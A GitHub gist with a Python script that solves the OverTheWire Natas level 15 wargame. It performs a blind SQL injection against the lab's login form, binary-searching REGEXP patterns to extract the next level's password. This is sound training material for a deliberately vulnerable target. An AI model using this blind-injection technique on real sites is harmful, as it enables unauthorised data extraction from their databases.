Created
June 23, 2015 12:19
-
-
Save adammw/2114722da8e859d91d58 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import math | |
import string | |
SQL_INJECTION = 'natas16" AND password REGEXP BINARY "^%s$"; -- ' | |
auth = ('natas15', '__CENSORED__') | |
characters = string.ascii_lowercase + string.ascii_uppercase + string.digits | |
total_characters = len(characters) | |
password_length = 32 | |
matching = '' | |
while len(matching) < password_length: | |
remaining_length = password_length - len(matching) | |
chars_start = 0 | |
chars_end = total_characters | |
matching_char = '' | |
while not matching_char: | |
midpoint = int(math.ceil((chars_end + chars_start) / 2.0)) | |
chars_to_try = characters[chars_start:midpoint] | |
password_regex = '%s[%s][a-zA-Z0-9]{%i}' % (matching, chars_to_try, remaining_length - 1) | |
print '%s %i-%i (%i)' % (chars_to_try, chars_start, midpoint, chars_end) | |
print password_regex | |
r = requests.post('http://natas15.natas.labs.overthewire.org/index.php', auth=auth, data={'username': SQL_INJECTION % password_regex }) | |
if 'exists' in r.text: | |
if (midpoint - chars_start) <= 1: | |
matching_char = characters[chars_start] | |
chars_end = midpoint | |
else: | |
if (midpoint - chars_start) <= 1: | |
matching_char = characters[chars_start+1] | |
chars_start = midpoint | |
matching = matching + matching_char | |
print 'found: %s' % (matching_char) | |
print 'found password: %s' % matching |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment